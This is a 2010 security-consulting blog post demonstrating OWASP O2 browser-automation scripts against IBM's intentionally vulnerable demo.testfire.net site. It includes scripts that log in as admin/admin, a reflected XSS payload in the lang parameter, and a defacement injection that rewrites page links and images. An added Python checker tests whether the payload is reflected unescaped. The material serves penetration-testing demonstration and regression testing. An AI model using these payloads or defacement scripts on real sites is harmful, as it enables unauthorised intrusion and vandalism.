
Parsons Software Security Consulting Blog

The power of O2 scripting


Dinis Cruz is the creator of O2. He was kind enough to give me a lesson on O2 Internet Explorer automated scripting. This is a really powerful tool, and I think scripts like these will become the end deliverable that software security testers hand to their clients: instead of a screenshot, the script recreates the vulnerability step by step, in an automated and repeatable fashion.

Let's get started creating an automated XSS script for IBM's demo.testfire.net test application. In a previous post we showed that the lang parameter is vulnerable to XSS, and we exploited it manually with both IBM AppScan and O2's XSS creator.

Try O2.

First you will need to install O2. O2 is free and open source, and it is also an OWASP project.

Once you have downloaded the tool you will need to sync the scripts.

Click on Custom O2 scripts.

Dinis created an O2 script for my engagement and my business, Parsons Software Security Consulting, LLC. Drag and drop the "Matt parsons v0.1 (Custom O2.h2)" script onto the logo.

This is the O2 user interface.

Double-click on IE Automation. Dinis told me that this part of O2 got a lot of traction at OWASP Brazil, where people were really excited about it.

Below are the default scripts.

The default page is http://www.google.com.

Below is the sample script.


var ie = panel.add_IE().silent(true);
ie.open("http://www.google.com");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

It is basically C#: the three trailing comment lines are O2 directives that pull in the WatiN IE extension methods, the O2 utility namespace and the WatiN assembly the script depends on.

Here is the first script Dinis created.

var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net");

// Not logged in yet: the home page still shows the Sign In link
if (ie.hasLink("Sign In"))
{
    ie.link("Sign In").click();
    ie.field("uid").value("admin");    // demo account shipped with the test site
    ie.field("passw").value("admin");
    ie.button("Login").click();
}
else
    ie.link("MY ACCOUNT").click();     // already authenticated from a previous run

return ie.fields();

This script opens the IBM demo web site and logs you in as admin. One of the users on the IBM test site is admin (password admin).

The site welcomes you as the admin user.

Next we launch an XSS attack against the lang parameter that our web scanner found vulnerable.


var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net");

if (ie.hasLink("Sign In"))
{
    ie.link("Sign In").click();
    ie.field("uid").value("admin");
    ie.field("passw").value("admin");
    ie.button("Login").click();
}
else
    ie.link("MY ACCOUNT").click();

// Navigate to the page that reflects the lang parameter
ie.link("Customize Site Language").click();
ie.link("International").click();

// currentUrl ends in ?lang=international, so appending the payload
// puts it straight into the reflected lang value
var currentUrl = ie.url();
var xssPayload = "aaa><script> alert('xss')</script>";
ie.open(currentUrl + xssPayload);

return currentUrl;

See the alert box: the XSS fires.
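The O2 script above proves the XSS by letting you watch the alert box pop. When a client wants the same check in a report, or in a regression test, it is better to build the attack URL deliberately and test the response for an unencoded reflection rather than rely on an eyeball. The following is an added example, not code from the original post or from the O2 Platform: the two page templates are constructed stand-ins for the vulnerable customize.aspx and for a fixed version that applies output encoding, and the payload is the one the post uses.

```python
"""Added example (not from the original post or the O2 Platform).

Builds the attack URL the way the O2 script does, but with proper query
encoding, and then checks whether the server reflected the payload back
without HTML-encoding it.  The two page templates are constructed
stand-ins for customize.aspx: one vulnerable, one fixed.
"""

import html
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Same marker the post used; the leading '>' closes whatever tag the value
# is echoed into, and the script tag is the proof of execution.
XSS_PAYLOAD = "aaa><script>alert('xss')</script>"


def build_attack_url(current_url: str, param: str, payload: str) -> str:
    """Append the payload to one query parameter and re-encode the query.

    The post's script does ie.open(currentUrl + xssPayload), which only
    works because the vulnerable parameter happens to be last in the query
    string.  Rewriting the query explicitly keeps other parameters intact
    and keeps the request well-formed.
    """
    parts = urlsplit(current_url)
    query = parse_qs(parts.query, keep_blank_values=True)
    current = query.get(param, [""])[0]
    query[param] = [current + payload]
    return urlunsplit(parts._replace(query=urlencode(query, doseq=True)))


def vulnerable_customize_page(lang: str) -> str:
    """Constructed stand-in for the vulnerable page: echoes lang verbatim."""
    return f"<html><body><p>Current Language: {lang}</p></body></html>"


def fixed_customize_page(lang: str) -> str:
    """Same page with HTML output encoding applied to the echoed value."""
    safe = html.escape(lang, quote=True)
    return f"<html><body><p>Current Language: {safe}</p></body></html>"


def is_reflected_unescaped(response_body: str, payload: str) -> bool:
    """True when the raw payload (with < > ' intact) appears in the body.

    A page that encodes the value reflects it as &lt;script&gt;..., which
    is harmless and must not be counted as a finding.
    """
    return payload in response_body


def lang_from_url(url: str) -> str:
    """What a server-side handler reads for ?lang=... (the decoded value)."""
    return parse_qs(urlsplit(url).query).get("lang", [""])[0]


def check_xss(render, base_url: str, param: str = "lang",
              payload: str = XSS_PAYLOAD) -> bool:
    """Drive the stand-in 'server' with the attack URL and report reflection."""
    attack_url = build_attack_url(base_url, param, payload)
    body = render(lang_from_url(attack_url))
    return is_reflected_unescaped(body, payload)


if __name__ == "__main__":
    base = "http://demo.testfire.net/bank/customize.aspx?lang=international"
    print(build_attack_url(base, "lang", XSS_PAYLOAD))
    print("vulnerable page reflects payload:", check_xss(vulnerable_customize_page, base))
    print("fixed page reflects payload:     ", check_xss(fixed_customize_page, base))
```

Against a live target you would replace the `render` callable with an HTTP fetch of the attack URL and feed the response body to `is_reflected_unescaped`; the decision logic stays the same, and the encoded reflection from the fixed page correctly comes back as "not vulnerable".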

Now, with this script, we are going to show what a serious XSS defacement of the page would look like.


panel.clear();
var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net/bank/customize.aspx?lang=international");

// Find the paragraph that echoes the lang value (the text must match the page exactly)
var target = ie.elements("P").str("Curent Language: international ");
target.flash();

// Insert the defacement markup just before that paragraph; DEFER is what makes
// IE run a script block that was inserted this way
target.injectHtml("beforeBegin", "<h1>O2 Platform Demos</h1>" +
    "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform.com\">OWASP O2 Platform</a>" +
    "<script DEFER>    " +
    "    //alert(document.links[0].href);" +
    "    document.links[0].href = \"http://o2platform.com\";" +
    "    document.images[0].src = \"http://o2platform.com/images/a/a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" +
    "    //alert(document.images[0].sec);" +
    "    //document.images[1].href = " +
    "    //alert(document.images[1].href);" +
    "</script>");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

Remember that all of this is automated: the script walks through each step and produces the defacement. Note that injectHtml writes the markup into the DOM of the automated browser, so this script shows a client what the defaced page would look like to a victim; in a real attack the same markup would be delivered through the vulnerable lang parameter, as in the previous script.

If you have any questions e-mail me at mparsons1980@gmail.com

Matt Parsons, CISSP, MSM

Written by mparsons1980

November 24, 2010 at 2:00 am


One Response


  1. I couldn't reproduce this payload here; I think it's because of the quotes inside the href, so I simplified it to:

    target.injectHtml("beforeBegin", "O2 Platform Demos" +
        "The best way to learn about the security vulnerabilities of this website is to use the " +
        "OWASP O2 Platform");

    Thiago

    December 2, 2010 at 2:36 pm

